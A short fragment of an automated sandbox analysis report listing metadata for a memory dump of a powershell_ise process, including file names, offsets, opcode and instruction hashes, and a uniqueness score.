                                  • Source File: 00000006.00000002.1027082920.00000000001B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1b2000_powershell_ise.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd4d2e6ed11bcb9d10a0c8dd736c2691efc3f2a787622d3552d5f08b8887ea76
                                  • Instruction ID: 267e6f482db5bdc7516d358811f05fc8bbe915e8ba20fd42123205e828e04acb
                                  • Opcode Fuzzy Hash: cd4d2e6ed11bcb9d10a0c8dd736c2691efc3f2a787622d3552d5f08b8887ea76
                                  • Instruction Fuzzy Hash: 77D05E343001814FDB15DA0CC294F9973E4BF84704F0644E8EC108B276C3B8DDC5C600
                                  Uniqueness

                                  Uniqueness Score: -1.00%